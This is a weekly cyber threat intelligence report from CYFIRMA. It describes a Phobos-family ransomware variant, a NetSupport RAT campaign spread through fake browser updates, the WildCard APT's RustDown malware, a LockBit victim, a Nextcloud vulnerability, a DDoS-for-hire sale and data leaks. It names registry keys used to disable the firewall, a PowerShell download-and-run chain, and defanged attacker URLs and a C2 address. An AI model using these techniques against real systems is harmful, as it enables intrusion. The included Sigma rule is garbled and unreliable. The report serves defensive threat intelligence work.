Self Assessment

Weekly Intelligence Report – 01 Dec 2023

Published On : 2023-12-01
Share :
Weekly Intelligence Report – 01 Dec 2023

Ransomware of the Week

CYFIRMA Research and Advisory Team would like to highlight ransomware trends and insights gathered while monitoring various forums. This includes multiple – industries, geography, and technology – which could be relevant to your organization.

Type: Ransomware.
Target Technologies: MS Windows.


CYFIRMA Research and Advisory Team has found ransomware known as Vx-underground while monitoring various underground forums as part of our Threat Discovery Process.


Researchers have found a ransomware strain called Vx-underground, belonging to the Phobos ransomware family. It’s important to note that this malicious software is distinct from vx-underground, an online repository for malware-related content, such as source code, samples, and research papers.

Phobos emerged in 2019, is believed to be a ransomware-as-a-service stemming from the Crysis ransomware family. It achieved widespread distribution through numerous affiliated threat actors in 2023.

During the file encryption process, the malware appends the “.id[[unique_id].[staff@vx-].VXUG” string to the filenames. It’s important to note that the email address “[email protected]” is legitimate, and the final extension “VXUG” stands for VX-Underground.

Screenshot of the files encrypted by Vx-underground ransomware (Source: Surface web)

Upon completion, ransomware generates two ransom notes on the Windows Desktop and other locations. The initial note, titled ‘Buy Black Mass Volume I.txt,’ playfully references VX by stating that the decryption password isn’t the common “infected,” which is typically used on all VX malware archives.

Text ransom note of Vx-underground ransomware (Source: Surface web)

The second note is an HTA file called ‘Buy Black Mass Volume II.hta.’ It’s a typical Phobos ransom note but customized to incorporate the VX-Underground logo, name, and contact details. The term “Black Mass” refers to books authored by VX-Underground.

Ransomnote by Vx-underground ransomware (Source: Surface web)

The Vx-underground ransomware encrypts both local and network-shared files, avoiding critical system files to prevent system disruption. It excludes files already encrypted by other ransomware, employs a process closure strategy to ensure smooth encryption, and deletes Volume Shadow Copies. The ransomware disables the Firewall. The ransomware ensures persistence by copying itself to %LOCALAPPDATA% and registering with specific Run keys, initiating with every system restart. Additionally, it can extract geolocation data to assess the target’s potential value based on economic and geopolitical factors.

Following are the TTPs based on the MITRE Attack Framework.

Sr. No Tactics Techniques/Sub-Techniques
1 TA0002: Execution T1047: Windows Management Instrumentation

T1053: Scheduled Task/Job

T1106: Native API

T1129: Shared Modules

2 TA0003: Persistence T1053: Scheduled Task/Job

T1547.001: Boot or Logon Autostart Execution:

Registry Run Keys / Startup Folder

T1574.010: Hijack Execution Flow: Services

File Permissions Weakness




Privilege Escalation

T1053: Scheduled Task/Job

T1055: Process Injection

T1547.001: Boot or Logon Autostart Execution:

Registry Run Keys / Startup Folder

T1574.010: Hijack Execution Flow: Services

File Permissions Weakness

4 TA0005: Defense Evasion T1036: Masquerading

T1055: Process Injection

T1202: Indirect Command Execution

T1497: Virtualization/Sandbox Evasion

T1562.001: Impair Defenses: Disable or Modify


T1564.003: Hide Artifacts: Hidden Window

T1574.010: Hijack Execution Flow: Services

File Permissions Weakness

5 TA0006: Credential Access T1003: OS Credential Dumping

T1552.002: Unsecured Credentials: Credentials in Registry

6 TA0007: Discovery T1018: Remote System Discovery

T1057: Process Discovery

T1082: System Information Discovery

T1083: File and Directory Discovery

T1497: Virtualization/Sandbox Evasion

T1518.001: Software Discovery: Security

Software Discovery

7 TA0009: Collection T1005: Data from Local System

T1560: Archive Collected Data

8. TA0011: Command and Control T1071.001: Application Layer Protocol: Web


T1095: Non-Application Layer Protocol

T1105: Ingress Tool Transfer

T1571: Non-Standard Port

T1573: Encrypted Channel

9 TA0040: Impact T1486: Data Encrypted for Impact


Relevancy and Insights:

  • The ransomware specifically focuses on the extensively used Windows Operating System, which is widespread across a multitude of industries and organizations.
  • Detect-Debug-Environment: Debugging environments are used by developers to
    analyze and troubleshoot software. Ransomware that can detect debug environments may have implemented techniques to evade or disable debugging tools.
  • Calls to WMI: The ransomware is making calls to the Windows Management Instrumentation (WMI) framework. WMI is a powerful tool used by many legitimate applications and services, but it can also be exploited by malware to evade detection and gain access to sensitive information.
  • By checking the CPU name, the ransomware can gather information about the victim’s computer hardware. This insight can help the attackers determine the system’s compatibility with specific exploit techniques or identify potential vulnerabilities to exploit.
  • Persistence: The ransomware exhibits persistence mechanisms to ensure its survival and ongoing malicious activities within the compromised environment. This could involve creating autostart entries or modifying system settings to maintain a foothold and facilitate future attacks.
  • Ransomware evades network defenses by disabling Windows Firewall, by modifying registry keys like HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Paramet ers\FirewallPolicy\PublicProfile\EnableFirewall and HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Paramet ers\FirewallPolicy\PublicProfile\DoNotAllowExceptions, setting the DWORD values to 0x00000000.
  • Ransomware achieves persistence by adding a malicious executable (AntiRecuvaAndDB in this case) to the HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run registry key. This ensures automatic execution during startup.

ETLM Assessment:

CYFIRMA’s assessment, based on available information about Vx Underground, suggests that as ransomware threats continue to evolve, there is an anticipated increase in focus on sophisticated tactics. This includes leveraging detection evasion mechanisms, persistent strategies, and diverse techniques for reconnaissance and lateral movement. Further integration of anti-analysis capabilities to thwart debugging environments is expected. The use of Windows Management Instrumentation (WMI) for malicious purposes may rise, presenting challenges for detection. Organizations should prioritize robust cybersecurity measures, including behavioral analysis, to counter these advanced threats in the evolving landscape.

Indicators of Compromise

Kindly refer to the IOCs section to exercise controls on your security systems.

Sigma Rule:

title: Suspicious File Creation Activity from Fake Recycle.Bin Folder tags:
– attack.persistence
– attack.defense_evasion logsource:
category: file_event product: windows
detection: selection:
– Image|contains:
– TargetFilename|contains:
condition: selection falsepositives:
– Unknown level: high
(Source: Surface web)


  • Implement competent security protocols and encryption, authentication, or access credentials configurations to access critical systems in your cloud and local environments.
  • Ensure that backups of critical systems are maintained which can be used to restore data in case a need arises.


  • A data breach prevention plan must be developed considering, (a) the type of data being managed by the company; (b) the remediation process; (c) where and how the data is stored; (d) if there is an obligation to notify the local authority.
  • Enable zero-trust architecture and multifactor authentication (MFA) to mitigate the compromise of credentials.
  • Foster a culture of cybersecurity, where you encourage and invest in employee training so that security is an integral part of your organization.


  • Update all applications/software regularly with the latest versions and security patches alike.
  • Build and undertake safeguarding measures by monitoring/ blocking the IOCs and strengthening defence based on the tactical intelligence provided.
  • Add the Sigma rules for threat detection and monitoring which will help to detect anomalies in log events, identify and monitor suspicious activities.

Trending Malware of the Week

Type: Remote Access Trojan (RAT)
Objective: Remote Access, Espionage, Malware Implant Target Sectors: Education, Government and Business Services
Target Technology: Windows OS

Active Malware of the Week

This week “NetSupport RAT” is trending.


Threat actors have been misusing legitimate software, specifically NetSupport Manager, as a Remote Access Trojan (RAT) for unauthorized access and attacks. In recent weeks, researchers have identified over 15 new infections associated with NetSupport RAT. The affected sectors include Education, Government, and Business Services, indicating a concerning rise in malicious use within these industries.

NetSupport RAT

NetSupport Manager, originally designed for remote technical support, has been exploited by threat actors as a Remote Access Trojan (RAT) in recent years. The RAT gained prominence in 2020 through a widespread COVID-19 phishing campaign. Its delivery methods include fraudulent updates, drive-by downloads, malware loaders like GhostPulse, and various phishing tactics. Due to its legitimate origins and broad availability, NetSupport Manager is used by multiple threat actors, including TA569 known for SocGholish malware. Its accessibility makes it attractive to a range of attackers, from novices to sophisticated adversaries. Older versions of NetSupport RAT employed .BAT and .VBS files, often as decoys, with only one responsible for executing the RAT and ensuring persistence.

Attack Method

Recent NetSupport RAT attacks involve the trojan being downloaded onto victims’

In this infection scenario, victims are lured into downloading a fake browser update when visiting compromised websites. These sites host a PHP script that convincingly presents a fake update. Clicking on the download link triggers the download of an additional JavaScript payload onto the victim’s endpoint, facilitating the infection. The attack unfolds in distinct stages:

1. Initial Compromise

  • Victim is deceived into downloading a fake browser update from compromised websites.
  • The downloaded payload, named Update_browser_10.6336.js, establishes external network connections to implacavelvideos[.]com.

2. Execution and Payload Handling

  • Update_browser_10.6336.js invokes powershell.exe to execute obfuscated commands.
  • Powershell.exe connects to kgscrew[.]com and passes a Base64 snippet in memory.
  • The Base64 data is then decoded and stored in a file called

3. File Extraction and NetSupport Installation

  • Contents of are extracted into the directory: \appdata\roaming\divx-429\.
  • Decompressed file includes NetSupport dependencies/DLLs and NetSupport Manager.

4. Malicious Capabilities

  • NetSupport, once installed, can monitor behavior, transfer files, manipulate computer settings, and propagate within the network.

5. Persistence

  • Persistence is established by adding client32.exe to the HKCU Run registry key.
  • \SOFTWARE\Microsoft\Windows\CurrentVersion\Run\DIVXX or \SOFTWARE\Microsoft\Windows\CurrentVersion\Run\DIVX
  • PowerShell is used to invoke client32.exe, which connects to the NetSupport RAT Command and Control server at 5[.]252[.]177[.]111(sdjfnvnbbz[.]pw).

PowerShell Breakdown

Researchers identified a suspicious PowerShell.exe process with a command line linked to a .JS file named “update_browser_10.6336.js,” confirming it as the NetSupport RAT. Upon examining the command line, a URL was discovered, specifically hxxps[:]//gamefllix[.]com/111.php?9279, which was used to download additional payloads through the DownloadString function in this particular attack.

Reverse Engineering PowerShell

When a compromised endpoint connects to the affected URL, the payload is downloaded. The obtained payload is the GET response of the obfuscated script from the compromised URL (gamefllix[.]com/111[.]php). The script seems to be base64 encoded, prompting researchers to attempt decoding using CyberChef; however, the output remains unreadable. Notably, the PK header at the file’s start indicates a ZIP archive. Some file names, such as CacheMD5.dat, CacheURL.dat, and client32.exe, along with an additional URL, emerge from the CyberChef output.

Researchers then used PowerShell in a secure environment to reconstruct the ZIP archive from the base64 encoded contents of gamefllix[.]com. The reconstructed files, including Client32.ini with GatewayAddress details, revealed that client32.exe established a network connection on port 443 using RADIUSSecret for authentication. NetSupport licensing information extracted from NSM.LIC includes the name HANEYMANEY under the licensee field, associated with threat actor TA569, known for delivering payloads via fake browser updates. While a direct correlation may be uncertain, the observed behavior raises suspicions of a compromised or leaked NetSupport Manager license.


  • NetSupport Manager, a tool originally designed for legitimate purposes, has sadly become a favored instrument for cybercriminals, similar to TeamViewer. The NetSupport RAT, once infiltrated, reveals its robust and powerful capabilities, allowing threat actors to cleverly disguise the installation process. Notably, these malicious actors exhibit a high level of adaptability, swiftly updating their strategies to lure victims into installing the harmful remote-control software. This highlights the dynamic and evolving nature of cybersecurity threats.
  • Cybercriminals have been employing diverse strategies to trick individuals into downloading remote access tools, such as NetSupport RAT, with the aim of pilfering information and personal data for financial gain. NetSupport Manager, a potent tool within their arsenal, has been notably used for real-time system monitoring and simultaneous viewing of all connected workstations. This sophisticated remote access tool not only provides detailed system information, including operating system details, computer specifications, and geographic location but also facilitates seamless data and file transfer between connected computers.
  • In recent incidents, threat actors have been exploiting legitimate remote-control tools in their attacks. When infected with such remote-control malware, the compromised system falls under the control of the threat actor, leading to potential damages such as information extortion and the installation of additional malware. The misuse of commonly used remote control tools highlights a concerning trend where threat actors leverage the familiarity of these tools to infiltrate systems discreetly. This underscores the need for heightened awareness and security measures to mitigate the risks associated with the abuse of such tools, emphasizing the importance of securing not only traditional attack vectors but also everyday tools that can be repurposed for malicious intent.


  • From the ETLM perspective, CYFIRMA anticipates that the strategy employed by cybercriminals, tricking individuals into downloading and installing the NetSupport RAT through deceptive updaters, is likely to persist and evolve. The use of fake Google Chrome, Mozilla Firefox, and other updaters serves as a disguise for malicious activities. In the future, we can anticipate cybercriminals refining these deceptive tactics, potentially expanding to target additional widely used software and applications. This approach not only poses an ongoing threat to individuals but also raises concerns for organizations, as the NetSupport RAT, once installed, can serve as a conduit for various cyber threats. Cybercriminals are likely to continue exploiting legitimate software like NetSupport Manager, capitalizing on its widespread use and user-friendliness to covertly compromise systems. The use of obfuscated scripts, PowerShell commands, and complex multi-stage attacks may become more prevalent, challenging organizations to enhance their threat detection and response capabilities.

Indicators of Compromise

Kindly refer to the IOCs Section to exercise controls on your security systems.


  • Create a strategy of layering security controls in the organization to make it difficult for adversaries to carry out reconnaissance, exploiting a weakness in the system and potential exfiltration of data.
  • Deploy a unified threat management strategy – including malware detection, deep learning neural networks, and anti-exploit technology – combined with vulnerability and risk mitigation processes.
  • Configure organization’s intrusion detection systems (IDS), intrusion prevention systems (IPS), or any network defence mechanisms in place to alert on — and upon review, consider blocking connection attempts to and from — the external IP addresses and domains listed in the appendix.


  • Implement real-time website monitoring to analyse network traffic going in and out of the website to detect malicious behaviours.
  • Move beyond the traditional model of security awareness towards Improved Simulation and training exercises that mimic real attack scenarios, account for behaviors that lead to a compromise, and are measured against real attacks the organization receives.
  • Security Awareness training should be mandated for all company employees. The training should ensure that employees:
  • Avoid downloading and executing files from unverified sources.


  • Build and undertake safeguarding measures by monitoring/ blocking the IOCs and strengthening defence based on the tactical intelligence provided.
  • Always listen to the research community and customer feedback when contacted about potential vulnerabilities detected in your infrastructure, or related compliance issues.
  • Employ User and Entity Behavior Analytics (UEBA) in tracking, collecting, and analyzing of user and machine data to detect threats within an organization.

Weekly Intelligence Trends/Advisory

Weekly Attack Type and Trends

Key Intelligence Signals:

  • Attack Type: Malware Implant, Ransomware Attacks, Vulnerabilities & Exploits, DDoS, Data Leaks.
  • Objective: Unauthorized Access, Data Theft, Data Encryption, Financial Gains, Espionage.
  • Business Impact: Data Loss, Financial Loss, Reputational Damage, Loss of Intellectual Property, Operational Disruption.
  • Ransomware –LockBit 3.0 Ransomware | Malware – NetSupport RAT
  • LockBit 3.0 Ransomware – One of the ransomware groups.
  • Please refer to the trending malware advisory for details on the following:
  • Malware – NetSupport RAT
  • Behaviour –Most of these malwares use phishing and social engineering techniques as their initial attack vectors. Apart from these techniques, exploitation of vulnerabilities, defence evasion, and persistence tactics are being observed.

Threat Actor in Focus

Unveiling WildCard: Advanced Threat Actor Targeting Critical Sectors in Israel

  • Threat Actors:WildCard
  • Attack Type: Unknown
  • Objective: Espionage
  • Target Technology: Windows
  • Target Geographies: Israel
  • Target Industries: Education, Critical Infrastructure
  • Business Impact: Data Loss, Data exfiltration

Recent investigation into the WildCard APT group reveals a sophisticated threat landscape, initially identified through the SysJoker malware targeting Israel’s educational sector in 2021. The group’s expansion into creating intricate malware variants, such as the RustDown written in Rust, indicates a strategic focus on critical sectors within Israel. Despite gaining insights into WildCard’s tactics, their precise identity remains elusive, necessitating further in-depth analysis and collaboration within the information security community.

In October 2023, researchers uncovered RustDown, a new malware attributed to the WildCard APT group. Disguised as a PHP framework component, the 32-bit Windows executable utilizes obfuscation techniques, including encryption and dynamic PowerShell commands, for persistence and evasion. The PDB file path hints at the name “RustDown-Belal,” potentially connecting to a developer named Belal. RustDown exhibits similarities with WildCard’s earlier SysJoker variants, indicating a consistent threat actor. The malware’s complex obfuscation methods involve Base64 decoding and XOR key application. In the communication process with the command-and- control (C2), the WildCard’s RustDown malware employs a dead drop resolver, using a specific OneDrive link. The decoded C2 URL reveals an IP address. RustDown then communicates with the C2 via HTTP, using a format similar to SysJoker. The malware, like its predecessor, decodes the C2 and initiates an initial handshake by sending user information to /api/attach.

Relevancy & Insights:
Amid the Israeli-Hamas conflict, WildCard emerges as a non-traditional threat actor, The SysJoker malware, initially observed in 2021 and publicly disclosed in 2022, lacked attribution to a known actor. However, evidence suggests its involvement in the Israeli-Hamas conflict and a link to the 2016-2017 Electric Powder Operation against Israel Electric Company. The malware’s evolution, shifting from C++ to Rust, indicates a significant rewrite, potentially laying the groundwork for future modifications and enhancements. This campaign was attributed to Gaza Cybergang, a threat actor that is believed to be linked to the Palestinian organization Hamas.

ETLM Assessment:
The APT group, known for serving Hamas-affiliated interests, consistently targets Israeli organizations. However, it seems their activities are not restricted to this focus, as they are looking for possible expansion in their footprints to other geographies. The observed correlation suggests a more extensive strategic agenda that may have repercussions beyond a singular region, potentially influencing the global cyber landscape. Moreover, given the Tactics, techniques, and procedures (TTPs) employed by the group, the prospect of their expansion into new territories is a cause for concern. This underscores the critical need for heightened vigilance and proactive cybersecurity measures on a global scale to anticipate and effectively mitigate potential cyber threats originating from the operations of this group.


  • Conduct regular training sessions for employees to enhance their awareness of phishing threats and social engineering techniques. Human factors often play a significant role in cyber incidents.
  • Implement and strengthen cybersecurity measures to safeguard against APTs. This includes regularly updating security systems, conducting penetration testing, and ensuring the use of robust antivirus software.
  • Develop and regularly update an incident response plan. This plan should outline clear steps to be taken in case of a security breach, ensuring a swift and effective response.
  • Foster collaboration with other organizations, both within and outside the country, to share threat intelligence and collectively strengthen cybersecurity postures.

Indicators of Compromise

  • Kindly refer to the IOCs (Indicators of Compromise) Section to exercise controls on your security systems.

Major Geopolitical Developments in Cybersecurity

Russian hackers activity puts European power utilities on alert
A recent report on cyber defense of Europe warns of an increased operational tempo of Russian hackers currently underway against critical infrastructure in NATO countries in an echo of similar concern published earlier by CYFIRMA analysts. According to the report, Russia mainly attempts to steal data, paralyse systems critical to the functioning of the state and society, or impersonate state institutions, among other things, in order to sow disinformation or gain access to data. The activity was illustrated by recent activity by the GRU’s (Russian military intelligence) Sandworm APT in response to which European electrical utility executives and government ministers have called for increased vigilance and security against the prospect of Russian cyberattacks against the continent’s power grid. The Energy Ministry of Poland stated it has observed thousands of attacks and probes against the Polish energy grid taking place live coming out of Russia and non-democratic countries allied to Russia further East. According to the statement of the ministry, this anti-Western bloc has created special teams of people working on attacking the democratic states of the European Union via the fifth domain to cause havoc and political discontent. Cyber threats and cyberattacks in the energy sector in the European Union remain the top concern according to the statement.

ETLM Assessment:
The logistics industry and other critical infrastructure like ports, commodity processing hubs, energy infrastructure or communications confront substantial risks from advanced threat actors. Data we have recently published on the logistics industry reveals a consistent pattern of attacks, with a clear emphasis on developed economies and major global logistics hubs. Although true that the detection of APT campaigns has declined, a correlation between the current geopolitical landscape and the most targeted countries remains evident. Moreover, Russia seems to be increasingly employing privateering actors, motivated by financial gains to put distance between Moscow and the potential political fallout. Such a trend is expected to continue as privateers are offered ever more leniency: in the eyes of the Kremlin, the more global instability they help to create, the more attention is deflected from its persecution of Ukraine, with fewer resources available to oppose it.

Iranian hacktivists claim an attack on a U.S. water utilities
A local Municipal Water Authority in Pennsylvania has recently made public that the Iranian hacktivist group known as Cyber Av3ngers had taken control of one of the local water utility’s booster stations. The attack, which affected a station that monitors and regulates pressure for several small towns in the state. The attack was detected early and according to authorities neither the safety nor the availability of the townships’ water was affected with the utility operator switching to manual control. The attackers displayed a message on the station’s monitors expressing their political purpose in broken english: “You have been hacked Down with Israel Every equipment ‘made in Israel’ is Cyber Aveng3rs legal target” (sic). The utility uses a control system provided by Unitronics; an Israeli company.

The same hacktivist collective claimed attacks on utilities before, but those utilities have been located directly in Israel – the attack inside the United States indicates an expansion of the group’s activities.

ETLM Assessment:
As we have warned in our assessments in previous weeks, we are likely to see a spike in the activity of Iranian APTs attacking Israel and other countries that support Israel. These attacks are likely just the beginning with many more to be revealed in due time. So far Israel seems to have been largely successful in blunting state-directed attacks since it employs a proactive cyber defensive approach adopted by the Israeli National Cyber Directorate (INCD), as well as the mobilization of the country’s cyber security ecosystem due to the high-tech nature of the Israeli economy. However, the same cannot be said of every country supporting Israel and the risk of potential spill out is imminent.

The conflict in Gaza has revealed the complex and contradictory forces that shape Iran’s behavior and interests in the Middle East, which are driven by both ideology and pragmatism. Iran’s proxies in the region, namely Lebanese Hezbollah, Iraqi Popular Mobilization Forces and Yemeni Houthis have all joined the struggle and started a low intensity war against Israel and the U.S., mostly by way of rocket and drone attacks.

Hezbollah alone has lost over 50 fighters but the recent speech by its leader Hassan Nasrallah and Iranian supreme leader Ali Khamenei suggest that these attacks are likely meant to show Iran’s strength and deterrence capabilities to Israel and the United States, but also that Iran and its proxies are walking a thin line trying to avoid a direct clash that could harm Iran’s interests and security. Iranian officials have been walking a tightrope between their ideological commitment to the Palestinian cause and their pragmatic calculations of regional interests and risks. Their statements expose the dilemmas and difficulties that Iran confronts in dealing with its friends and foes. But they also reflect their domestic concerns and calculations. This however does not apply to the fifth domain, where the risk of high scale physical retaliation seems low. Israel’s National Cyber Directorate confirms this observation and states that the prospect of an intensified Iranian cyber campaign is deeply worrying, since Iran “knows that they can act there [in cyberspace] more freely than in physical space”.

Rise in Malware/Ransomware and Phishing

Kenso is Impacted by the LockBit 3.0 Ransomware

  • Attack Type: Ransomware
  • Target Industry: Manufacturing and Agriculture
  • Target Geography: Malaysia
  • Ransomware: LockBit 3.0 Ransomware
  • Objective: Data Theft, Data Encryption, Financial Gains
  • Business Impact: Financial Loss, Data Loss, Reputational Damage

From the External Threat Landscape Management (ETLM) Perspective, CYFIRMA observed in an underground forum that a company from Malaysia, (www[.]kenso[.]com[.]my), was compromised by LockBit 3.0 Ransomware. Kenso is engaged in manufacturing and distributing agrochemicals, fertilisers, and speciality hybrid vegetable seeds. The data, which has been breached, has not yet appeared on the leak site, indicating that negotiations between the affected party and the ransomware group may be underway. The compromised data includes confidential and sensitive information belonging to the organization.

The following screenshot was observed published on the dark web:

Source: Dark Web

Relevancy & Insights:

  • We observe that the Citrix Bleed vulnerability (CVE 2023-4966), CVSS score of 9.4 (Critical), exploited by LockBit 3.0 affiliates, enables threat actors to circumvent password requirements and multifactor authentication (MFA). This leads to the successful hijacking of legitimate user sessions on Citrix NetScaler web application delivery control (ADC) and Gateway appliances. By taking control of these sessions, malicious actors gain elevated permissions, allowing them to harvest credentials, move laterally, and access data and resources. However, CISA and the organizations issuing the advisory strongly recommend network administrators to implement mitigations outlined in the Cybersecurity Advisory (CSA). These measures include isolating NetScaler ADC and Gateway appliances and applying necessary software updates through the Citrix Knowledge Center.
  • In 2023, the LockBit 3.0 ransomware developed as a global threat, infiltrating numerous public and private organizations worldwide. Notably, the United States has experienced the major impact of this danger, with approximately 30% of the country’s institutions being singled out and subsequently affected by this ransomware.
  • Based on the LockBit 3.0 Ransomware victims list in 2023, the top 5 Target Countries are as follows:
  • Based on the LockBit 3.0 Ransomware victims list in 2023, the top 5 Target Countries are as follows:

ETLM Assessment:
CYFIRMA assesses that LockBit 3.0 Ransomware will continue to pose a global threat to companies worldwide. We notice that the LockBit 3.0 Ransomware is increasingly utilizing vulnerabilities and exploits within the product to gain initial access, allowing it to move laterally within organizational networks. The recent targeting of Kenso; a manufacturing company, based in Malaysia highlights the global risk posed. The US is their preferred target geography; however, they clearly do not limit their geographical reach.

Vulnerabilities and Exploits

Vulnerability in Nextcloud Server

  • Attack Type: Vulnerabilities & Eploits
  • Target Technology: Messaging Software
  • Vulnerability: CVE-2023-48239 (CVSS Base Score 8.5)
  • Vulnerability Type: Improper Access Control

The vulnerability allows a remote attacker to gain unauthorized access to otherwise restricted functionality.

Relevancy & Insights:
The vulnerability exists due to improper access restrictions.

A remote user can update any personal or global external storage and make them inaccessible for everyone else as well.

Affected Products : https[:]//github[.]com/nextcloud/security- advisories/security/advisories/GHSA-f962-hw26-g267

Monitoring and Detection: Implement monitoring and detection mechanisms to identify unusual system behavior that might indicate an attempted exploitation of this vulnerability.

This week, CYFIRMA researchers have observed significant impacts on various products due to a range of vulnerabilities. The following are the top 5 most affected products.

Latest Cyber-Attacks, Incidents, and Breaches

Anonymous Sudan Launches ‘Cyber Monday Sale’ for Skynet Godzilla DDoS Botnet

  • Threat Actors: Anonymous Sudan
  • Attack Type: DDoS
  • Objective: Operational Disruption
  • Target Geographies: Worldwide
  • Business Impact: Operational Disruption

Anonymous Sudan; a threat actor, is running a “Cyber Monday Sales Offer” for its Skynet Godzilla DDoS botnet. Speculations suggest that health claims about the group’s founder and financial difficulties may be a marketing ploy to boost sales. The dark web post advertises Skynet as a DDoS service used in their attacks, emphasizing its potency. Unusually, the group offers this tool as a service, contrary to typical cybercriminal behavior. The post hints at merging their tool with an unspecified entity, creating a more powerful combination, though the advantages remain unclear. The pricing details indicate that access to Skynet DDoS is offered at $100 for a day, $600 for a week, and $1700 monthly. The entity’s identity and the enhanced tool’s potential benefits are left ambiguous. The offer is valid until November 28. Skynet; a DDoS service, provided by Anonymous Sudan, has showcased its capability by launching attacks on several prominent targets. Notable victims include tech giants such as Apple and Telegram, cloud services like Azure, cybersecurity vendor Sucuri, content delivery network StackPath, and gaming giant PlayStation.

Relevancy & Insights:
Anonymous Sudan has gained notoriety among hacktivists by targeting prominent organizations with overwhelming DDoS attacks. In such a scenario, any such endorsement of tools/services by Anonymous Sudan would have endorsement benefits both monetarily and in gaining a larger subscriber base.

ETLM Assessment:
CYFIRMA assesses that the global impact of the Anonymous Sudan Skynet Sale is substantial. The sale of DDoS services serves as a strategic maneuver to bolster their influence within the hacking community, causing Operational Disruption for sales companies. Particularly, this tactic has a pronounced effect on script kiddies who admire such hackers and seek rapid notoriety. This underscores the critical need for governments and businesses to prioritize cybersecurity and address these concerns promptly.

Data Leaks

Kaggle Careers Data Advertised in Leak Site

  • Attack Type: Data Leaks
  • Target Industry: Business Services
  • Target Geography: The United States of America
  • Objective: Data Theft, Financial Gains
  • Business Impact: Data Loss, Reputational Damage

CYFIRMA Research team observed a potential data leak related to Kaggle Careers, {www[.]kaggle[.]com}. Kaggle Career is the world’s largest online data science competition community with more than 4 million+ members across 194 countries. Kaggle’s Career network fell victim to a data breach that resulted in 3,000,000 companies having their wage and business information leaked. The breached data includes SL NO, CASE STATUS, EMPLOYER NAME, SOC NAME, JOB TITLE, FULL TIME POSITION, PREVAILING WAGE, and additional confidential information.

Source: Underground forums

Relevancy & Insights:
Opportunistic cybercriminals motivated by financial gains are always on the lookout for
exposed and vulnerable systems as well as applications. The majority of these attackers operate in underground forums engaging in related conversations and buying/selling stolen digital goods. Unlike other financially motivated attackers such as ransomware groups or extortion groups who often publicize their attacks, these attackers like to operate under the hood. They gain access and steal valuable data by taking advantage of an unpatched system or exploiting a vulnerability in an application or system. The stolen data is then advertised for sale in underground forums, resold, and repurposed by other attackers in their attacks.

ETLM Assessment:
Although the cause of the Kaggle Careers data leak remains unclear, the threat actors responsible have a history of carrying out breaches for both political and financial motives. For instance, the same threat actor recently put up for sale sensitive information from organizations such as General Electric and DARPA, demonstrating their involvement in both politically and financially motivated cyber intrusions. CYFIRMA assesses U.S. institutions without robust security measures and infrastructure are expected to face an elevated risk of potential cyberattacks from this threat actor.

Other Observations

CYFIRMA Research team observed a potential data leak related to ShadowFax, {www[.]shadowfax[.]in}. Shadowfax Technologies is a company that operates in the Logistics and Supply Chain industry. ShadowFax Technologies, a company with a focus on delivery services, experienced a data breach resulting in the unauthorized exposure of information belonging to 5 million users. The compromised data includes User ID, MSG ID, Mobile, Sender, Sent time, Provider, Status MSG, Message, and other sensitive details.

Source: Underground forums


  • Attack Surface Management should be adopted by organizations, ensuring that a continuous closed-loop process is created between attack surface monitoring and security testing.
  • Deploy a unified threat management strategy – including malware detection, deep learning neural networks, and anti-exploit technology – combined with vulnerability and risk mitigation processes.
  • Incorporate Digital Risk Protection (DRP) in the overall security posture that acts as a proactive defence against external threats targeting unsuspecting customers.
  • Implement a holistic security strategy that includes controls for attack surface reduction, effective patch management, active network monitoring, through next generation security solutions and ready to go incident response plan.
  • Create risk-based vulnerability management with deep knowledge about each asset. Assign a triaged risk score based on the type of vulnerability and criticality of the asset to help ensure that the most severe and dangerous vulnerabilities are dealt with first.


  • Take advantage of global Cyber Intelligence providing valuable insights on threat actor activity, detection, and mitigation techniques.
  • Proactively monitor the effectiveness of risk-based information security strategy, the security controls applied and the proper implementation of security technologies, followed by corrective actions remediations, and lessons learned.
  • Move beyond the traditional model of security awareness towards improved simulation and training exercises that mimic real attack scenarios, account for behaviours that lead to a compromised, and are measured against real attacks the organization receives.
  • Consider implementing Network Traffic Analysis (NTA) and Network Detection and Response (NDR) security systems to compensate for the shortcoming of EDR and SIEM solutions.
  • Detection processes are tested to ensure awareness of anomalous events. Timely communication of anomalies and continuously evolved to keep up with refined ransomware threats.


  • Patch software/applications as soon as updates are available. Where feasible, automated remediation should be deployed since vulnerabilities are one of the top attack vectors.
  • Consider using security automation to speed up threat detection, improved incident response, increased the visibility of security metrics, and rapid execution of security checklists.
  • Build and undertake safeguarding measures by monitoring/ blocking the IOCs and strengthen defences based on tactical intelligence provided.
  • Deploy detection technologies that are behavioural anomaly-based to detect ransomware attacks and help to take appropriate measures.
  • Implement a combination of security control such as reCAPTCHA (Completely Automated Public Turing test to tell Computers and Humans Apart), Device fingerprinting, IP backlisting, Rate-limiting, and Account lockout to thwart automated brute-force attacks.
  • Ensure email and web content filtering uses real-time blocklists, reputation services, and other similar mechanisms to avoid accepting content from known and potentially malicious sources.